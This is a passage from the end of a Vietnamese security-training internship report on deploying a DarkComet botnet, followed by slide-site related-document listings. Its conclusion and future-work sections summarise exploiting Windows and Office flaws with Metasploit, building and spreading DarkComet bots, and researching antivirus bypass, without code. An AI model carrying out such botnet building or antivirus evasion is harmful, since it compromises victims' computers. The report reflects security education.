diện quản lí của DarkComet, ta có toàn quyền với máy của nạn nhân.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
30Trang
Giao diện quản lí users:
Giao diện điều khiển user:
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
31Trang
VI. HƯỚNG PHÁT TRIỂN
Công nghệ thông tin là ngành đang phát triển rất mạnh ở Việt Nam. Theo số liệu
từ “Sách trắng Công nghệ thông tin – Truyền thông 2013”, cả nước có trên 1300
trang thông tin điện tử, 420 trang mạng xã hội được cấp phép. Đi cùng với sự phát
triển này là số lượng các máy chủ (server) phục vụ các trang mạng, máy tính để
bàn (PC), máy tính xách tay (laptop) cũng tăng lên rất nhanh. Nếu không có các
biện pháp bảo mật nghiêm ngặt thì đây là môi trường rất thuận lợi cho sự phát
triển của botnet, zombie.
Để tiếp tục phát triển và đáp ứng yêu cầu thực tế, đề tài này cần nghiêng cứu mở
rộng theo các hướng:
- Các phương pháp bypass các antivirus hiện tại
- Các loại bot phổ biến và nguy hiểm khác
- Các cách phát tán botnet
- Các cách khai thác botnet
- Các phương pháp hiệu quả để phòng chống trở thành zombie, botnet
VII. KẾT LUẬN
Với sự chỉ bảo và hướng dẫn của thầy Võ Đỗ Thắng, sự chỉ bảo nhiệt tình của các
giảng viên và nhân viên của trung tâm cùng với sự nỗ lực làm việc của bản thân
em, đề tài “Nghiên cứu triển khai mạng lưới zombie, botnet trên hệ thống mạng”
của em đã được hoàn thành, nhưng vẫn còn một số yếu điểm.
Những nội dung chính đã đạt được:
- Cài đặt và sử dụng BackTrack 5.3 với giao diện đồ họa và giao diện dòng
lệnh.
- Sử dụng thành thạo phần mềm Metasploit khai thác các lỗi hệ điều hành,
các lỗi phần mềm Microsoft Office, Internet Explorer, Adobe Reader xâm
nhập thành công và toàn điều khiển từ xa máy nạn nhân
- Cài đặt thành công DarkComet trên Windows và linux
- Tạo bot bằng DarkComet với các tùy chọn
- Phát tán thành công bot, bước đầu xây dựng mạng lưới botnet
- Xâm nhập thành công và toàn quyền điều khiển máy nạn nhân thông qua
DarkComet bot.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
32Trang
VIII. TÀI LIỆU THAM KHẢO
1. “Tài liệu hướng dẫn và sử dụng backtrack 5 để khai thác lỗ hổng mạng tại
trung tâm athena”, Trung tâm đào tạo Quản trị mạng & An ninh mạng
Athena
2. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng
– Bí quyết và giải pháp”
3. Diễn đàn Athena, http://athena.edu.vn/forum/forum.php
4. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a-
capital-v
5. “Sách trắng Công nghệ thông tin – Truyền thông”, 2013, Bộ CNTT - TT

More Related Content

What's hot

Thiet lap an toan mang isa cho mang doanh nghiep
Thiet lap an toan mang isa cho mang doanh nghiepThiet lap an toan mang isa cho mang doanh nghiep
Thiet lap an toan mang isa cho mang doanh nghiepFC Loveit
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tapLeo Aurico
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_AthenaHuynh Khang
 
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ    thống vpn site to site trên isa 2006Tìm hiểu isa 2006 và triển khai hệ    thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006Hate To Love
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006xeroxk
 
Bao cao thuc tap athena tuan 1 2-3
Bao cao thuc tap athena tuan 1 2-3Bao cao thuc tap athena tuan 1 2-3
Bao cao thuc tap athena tuan 1 2-3HoangHai930705
 
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006Vo Ve Vi Vu
 
Pham_hong_quang
Pham_hong_quangPham_hong_quang
Pham_hong_quangrenlue
 
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...nataliej4
 
cấu hình access rule ISA 2006
cấu hình access rule ISA 2006cấu hình access rule ISA 2006
cấu hình access rule ISA 2006vuhosking
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kìDaewoo Han
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2Con Ranh
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚBáo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚCon Ranh
 
Báo Cáo thực tập _ system hacking
Báo Cáo thực tập _ system hackingBáo Cáo thực tập _ system hacking
Báo Cáo thực tập _ system hackingAnhh Hữu
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậtanhkhoa2222
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậpLuc Cao
 

What's hot (19)

Thiet lap an toan mang isa cho mang doanh nghiep
Thiet lap an toan mang isa cho mang doanh nghiepThiet lap an toan mang isa cho mang doanh nghiep
Thiet lap an toan mang isa cho mang doanh nghiep
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
 
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ    thống vpn site to site trên isa 2006Tìm hiểu isa 2006 và triển khai hệ    thống vpn site to site trên isa 2006
Tìm hiểu isa 2006 và triển khai hệ thống vpn site to site trên isa 2006
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Đề tài: Tìm hiểu giải pháp an ninh mạng với firewall, HAY, 9đ
Đề tài: Tìm hiểu giải pháp an ninh mạng với firewall, HAY, 9đĐề tài: Tìm hiểu giải pháp an ninh mạng với firewall, HAY, 9đ
Đề tài: Tìm hiểu giải pháp an ninh mạng với firewall, HAY, 9đ
 
Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006Báo Cáo Thự Tập ISA Server 2006
Báo Cáo Thự Tập ISA Server 2006
 
Bao cao thuc tap athena tuan 1 2-3
Bao cao thuc tap athena tuan 1 2-3Bao cao thuc tap athena tuan 1 2-3
Bao cao thuc tap athena tuan 1 2-3
 
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
Bao cao thuc tap tuần 3 - Nghiên cứu và triển khai hệ thống ISA 2006
 
Pham_hong_quang
Pham_hong_quangPham_hong_quang
Pham_hong_quang
 
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
ChuyenDeANM ung dung he thong IDS securityonion vao giam sat moi truong mang ...
 
System Hacking
System HackingSystem Hacking
System Hacking
 
cấu hình access rule ISA 2006
cấu hình access rule ISA 2006cấu hình access rule ISA 2006
cấu hình access rule ISA 2006
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚBáo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
 
Báo Cáo thực tập _ system hacking
Báo Cáo thực tập _ system hackingBáo Cáo thực tập _ system hacking
Báo Cáo thực tập _ system hacking
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mật
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 

Viewers also liked

BAO CAO THUC TAP TAI ATHENA
BAO CAO THUC TAP TAI ATHENABAO CAO THUC TAP TAI ATHENA
BAO CAO THUC TAP TAI ATHENAStephen Le
 
BÁO CÁO THỰC TẬP
BÁO CÁO THỰC TẬPBÁO CÁO THỰC TẬP
BÁO CÁO THỰC TẬPLinh Bé
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳdglylong
 
Mẫu báo cáo thực tập tốt nghiệp chuyên ngành kế toán
Mẫu báo cáo thực tập tốt nghiệp chuyên ngành kế toánMẫu báo cáo thực tập tốt nghiệp chuyên ngành kế toán
Mẫu báo cáo thực tập tốt nghiệp chuyên ngành kế toánÁc Quỷ Lộng Hành
 
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016tuan nguyen
 
Báo cáo thực tập kế toán tập hợp chi phí và tính giá thành
Báo cáo thực tập kế toán tập hợp chi phí và tính giá thànhBáo cáo thực tập kế toán tập hợp chi phí và tính giá thành
Báo cáo thực tập kế toán tập hợp chi phí và tính giá thànhHọc kế toán thực tế
 
Báo cáo thực tập tốt nghiệp chuyên ngành kế toán
Báo cáo thực tập tốt nghiệp chuyên ngành kế toánBáo cáo thực tập tốt nghiệp chuyên ngành kế toán
Báo cáo thực tập tốt nghiệp chuyên ngành kế toánDigiword Ha Noi
 

Viewers also liked (7)

BAO CAO THUC TAP TAI ATHENA
BAO CAO THUC TAP TAI ATHENABAO CAO THUC TAP TAI ATHENA
BAO CAO THUC TAP TAI ATHENA
 
BÁO CÁO THỰC TẬP
BÁO CÁO THỰC TẬPBÁO CÁO THỰC TẬP
BÁO CÁO THỰC TẬP
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳ
 
Mẫu báo cáo thực tập tốt nghiệp chuyên ngành kế toán
Mẫu báo cáo thực tập tốt nghiệp chuyên ngành kế toánMẫu báo cáo thực tập tốt nghiệp chuyên ngành kế toán
Mẫu báo cáo thực tập tốt nghiệp chuyên ngành kế toán
 
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
 
Báo cáo thực tập kế toán tập hợp chi phí và tính giá thành
Báo cáo thực tập kế toán tập hợp chi phí và tính giá thànhBáo cáo thực tập kế toán tập hợp chi phí và tính giá thành
Báo cáo thực tập kế toán tập hợp chi phí và tính giá thành
 
Báo cáo thực tập tốt nghiệp chuyên ngành kế toán
Báo cáo thực tập tốt nghiệp chuyên ngành kế toánBáo cáo thực tập tốt nghiệp chuyên ngành kế toán
Báo cáo thực tập tốt nghiệp chuyên ngành kế toán
 

Similar to Báo cáo thực tập - Quốc Nghị

Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...Danh Tran
 
Đồ Án Tốt Nghiệp Về Nghiên Cứu Kiến Trúc Mạng Internet, Sự Lây Lan Của Worm V...
Đồ Án Tốt Nghiệp Về Nghiên Cứu Kiến Trúc Mạng Internet, Sự Lây Lan Của Worm V...Đồ Án Tốt Nghiệp Về Nghiên Cứu Kiến Trúc Mạng Internet, Sự Lây Lan Của Worm V...
Đồ Án Tốt Nghiệp Về Nghiên Cứu Kiến Trúc Mạng Internet, Sự Lây Lan Của Worm V...mokoboo56
 
Luận Văn Phát Hiện Lỗ Hổng Bảo Mật Trong Mạng Lan Dựa Trên Phần Mềm Nguồn Mở.doc
Luận Văn Phát Hiện Lỗ Hổng Bảo Mật Trong Mạng Lan Dựa Trên Phần Mềm Nguồn Mở.docLuận Văn Phát Hiện Lỗ Hổng Bảo Mật Trong Mạng Lan Dựa Trên Phần Mềm Nguồn Mở.doc
Luận Văn Phát Hiện Lỗ Hổng Bảo Mật Trong Mạng Lan Dựa Trên Phần Mềm Nguồn Mở.docsividocz
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kìDaewoo Han
 
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]TranQuangChien
 
Bao cao cuoi ky - ATHENA
Bao cao cuoi ky - ATHENABao cao cuoi ky - ATHENA
Bao cao cuoi ky - ATHENAThongErik
 
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Tan Huynh
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athenaLe Chuong
 
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena kid zack
 
Báo Cáo Thực Tập- Athena
Báo Cáo Thực Tập- AthenaBáo Cáo Thực Tập- Athena
Báo Cáo Thực Tập- Athenaquocluong
 
Báo cáo đồ án thực tập chuyên môn
Báo cáo đồ án thực tập chuyên môn Báo cáo đồ án thực tập chuyên môn
Báo cáo đồ án thực tập chuyên môn Nguyễn Cường
 
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athenaquocluong
 
Cuoi kyluongnam
Cuoi kyluongnamCuoi kyluongnam
Cuoi kyluongnamShen Libra
 
Luận Văn Tìm Hiểu Hệ Thống Phát Hiện Cảnh Báo Nguy Cơ Tấn Công Mạng.doc
Luận Văn Tìm Hiểu Hệ Thống Phát Hiện Cảnh Báo Nguy Cơ Tấn Công Mạng.docLuận Văn Tìm Hiểu Hệ Thống Phát Hiện Cảnh Báo Nguy Cơ Tấn Công Mạng.doc
Luận Văn Tìm Hiểu Hệ Thống Phát Hiện Cảnh Báo Nguy Cơ Tấn Công Mạng.docsividocz
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athenaMinhThien3715
 

Similar to Báo cáo thực tập - Quốc Nghị (20)

Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
 
baocao1
baocao1baocao1
baocao1
 
Đồ Án Tốt Nghiệp Về Nghiên Cứu Kiến Trúc Mạng Internet, Sự Lây Lan Của Worm V...
Đồ Án Tốt Nghiệp Về Nghiên Cứu Kiến Trúc Mạng Internet, Sự Lây Lan Của Worm V...Đồ Án Tốt Nghiệp Về Nghiên Cứu Kiến Trúc Mạng Internet, Sự Lây Lan Của Worm V...
Đồ Án Tốt Nghiệp Về Nghiên Cứu Kiến Trúc Mạng Internet, Sự Lây Lan Của Worm V...
 
Luận Văn Phát Hiện Lỗ Hổng Bảo Mật Trong Mạng Lan Dựa Trên Phần Mềm Nguồn Mở.doc
Luận Văn Phát Hiện Lỗ Hổng Bảo Mật Trong Mạng Lan Dựa Trên Phần Mềm Nguồn Mở.docLuận Văn Phát Hiện Lỗ Hổng Bảo Mật Trong Mạng Lan Dựa Trên Phần Mềm Nguồn Mở.doc
Luận Văn Phát Hiện Lỗ Hổng Bảo Mật Trong Mạng Lan Dựa Trên Phần Mềm Nguồn Mở.doc
 
luan van thac si tim hieu he thong phat hien canh bao nguy co tan cong mang
luan van thac si tim hieu he thong phat hien canh bao nguy co tan cong mangluan van thac si tim hieu he thong phat hien canh bao nguy co tan cong mang
luan van thac si tim hieu he thong phat hien canh bao nguy co tan cong mang
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]
 
Tường lửa ip cop
Tường lửa ip copTường lửa ip cop
Tường lửa ip cop
 
Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳ
 
Bao cao cuoi ky - ATHENA
Bao cao cuoi ky - ATHENABao cao cuoi ky - ATHENA
Bao cao cuoi ky - ATHENA
 
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941
 
Baocaocuoiky giang cong_athena
Baocaocuoiky giang cong_athenaBaocaocuoiky giang cong_athena
Baocaocuoiky giang cong_athena
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
 
Báo Cáo Thực Tập- Athena
Báo Cáo Thực Tập- AthenaBáo Cáo Thực Tập- Athena
Báo Cáo Thực Tập- Athena
 
Báo cáo đồ án thực tập chuyên môn
Báo cáo đồ án thực tập chuyên môn Báo cáo đồ án thực tập chuyên môn
Báo cáo đồ án thực tập chuyên môn
 
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athena
 
Cuoi kyluongnam
Cuoi kyluongnamCuoi kyluongnam
Cuoi kyluongnam
 
Luận Văn Tìm Hiểu Hệ Thống Phát Hiện Cảnh Báo Nguy Cơ Tấn Công Mạng.doc
Luận Văn Tìm Hiểu Hệ Thống Phát Hiện Cảnh Báo Nguy Cơ Tấn Công Mạng.docLuận Văn Tìm Hiểu Hệ Thống Phát Hiện Cảnh Báo Nguy Cơ Tấn Công Mạng.doc
Luận Văn Tìm Hiểu Hệ Thống Phát Hiện Cảnh Báo Nguy Cơ Tấn Công Mạng.doc
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 

Recently uploaded

30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxChàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxendkay31
 
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxTrích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxnhungdt08102004
 
Sơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdfSơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdftohoanggiabao81
 
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...ThunTrn734461
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...Nguyen Thanh Tu Collection
 
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...Nguyen Thanh Tu Collection
 
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfChuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfhoangtuansinh1
 
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoabài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa2353020138
 
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Nguyen Thanh Tu Collection
 
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...hoangtuansinh1
 
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...Nguyen Thanh Tu Collection
 
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhvanhathvc
 
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...Nguyen Thanh Tu Collection
 
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Nguyen Thanh Tu Collection
 
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líKiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líDr K-OGN
 
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdfNQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdfNguyễn Đăng Quang
 

Recently uploaded (19)

30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
